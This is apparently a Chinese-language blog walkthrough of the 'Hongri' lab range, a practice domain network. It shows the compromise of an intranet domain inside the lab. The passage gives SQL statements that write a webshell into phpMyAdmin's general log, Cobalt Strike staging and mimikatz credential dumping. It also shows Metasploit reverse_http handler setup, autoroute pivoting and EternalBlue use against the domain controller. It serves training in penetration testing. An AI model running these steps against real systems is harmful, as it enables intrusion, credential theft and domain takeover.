红日靶场1

kali:192.168.157.137
windows7 :
外网ip: 192.168.157.128
内网ip: 192.168.52.143
win2K3:192.168.52.141
windows2008:192.168.52.138（域控主机）

环境配置

网络配置：

windows7

win2K3

windows2008

kali

开启win7中的PHP study

web渗透

用nmap扫描开放端口

发现开放80端口
访问80端口

利用御剑扫描目录，得到http://192.168.157.128/phpmyadmin/页面

可以使用密码爆破，但我这里看到别人写的密码就直接用了，用户名和密码都是root
登录页面

尝试用日志写入木马getshell
1.查看日志功能是否开启
show global variables like ‘%general%’
2.未开启的话设置为 on
set global general_log=‘ON’
3.开启后将日志文件的存储位置改为可访问到的目录， 根目录即可
set global general_log_file = ‘C:/phpStudy1/WWW/3.php’
4.执行下边一句话木马
数据库将会将查询语句保存在日志文件中
SELECT ‘’
5.写入成功后 使用蚁剑连接

我这里已经做过一次了，在win7下已经生成了3.php文件了，你们只要按照这个语句执行就行。

使用蚁剑连接

连接成功

拿下webshell之后进行一些简单的信息收集

内网信息探测

上线CS

点击耳机图标，创建新的监听器

利用CS生成exe可执行程序

上传到windows7上面

执行exe文件

看到靶机上线了

直接提权

运行mimikatz,获取密码

内网域环境信息的收集

使用 ipconfig /all 查看 DNS 服务器，发现主 DNS 后缀不为空，存在域god.org

上面发现 DNS 服务器名为 god.org，当前登录域为 GOD，那接下来可执行net view /domain查看有几个域

感觉回显太慢，直接运行sleep 0,但在实操的时候是不能这样的，会被发现

只有一个域，那就利用 net group “domain controllers” /domain 命令查看域控制器主机名，直接确认域控主机的名称为 OWA

域控主机的名称为 OWA，点击准星那个图标，可得知域控主机的 IP 为 192.168.52.138

局域网扫描出来除了域控主机之外还有另一台主机（名称为ROOT-TVI862UBEH），最后再确认一下该主机是否也是存在域中，故执行命令net group “domain computers” /domain 查看域中的其他主机名，发现包含ROOT-TVI862UBEH，故域中还包含一个域成员主机192.168.52.141

至此内网域信息搜集完毕，已经明确了域控主机为192.168.52.138，同时还存在另一台域成员192.168.52.141，接下来的目标就是横向渗透拿下域控！

内网横向渗透

接下来将通过 Win7 跳板机，横向渗透拿下内网域内的域成员主机和域控主机
利用msf和CS联动

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http（跟cs上选用的payload一样）
set lhost 本机ip
set lport 接受的端口
exploit 执行

然后到CS中创建新的foreign监听器

点击spawn,选择刚刚创建的监听器，就能看到msf生成了新的会话

配置路由

#加载MSF的autoroute模块，获取当前机器的所有网段信息
meterpreter > run post/multi/manage/autoroute
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

MSF内网端口扫描
扫出来192.168.52.141和192.168.52.138都开放了445端口，这就可以利用永恒之蓝漏洞

一开始我的445端口没开，我重启win2K3就又打开了

利用永恒之蓝漏洞拿下域控主机

执行命令screenshot截取目标靶机的屏幕，确认已拿下域控

利用msf去远程控制靶机我没实现，因为我的kali机没有联网，操作不了

以上就是全部拿到域控主机的过程。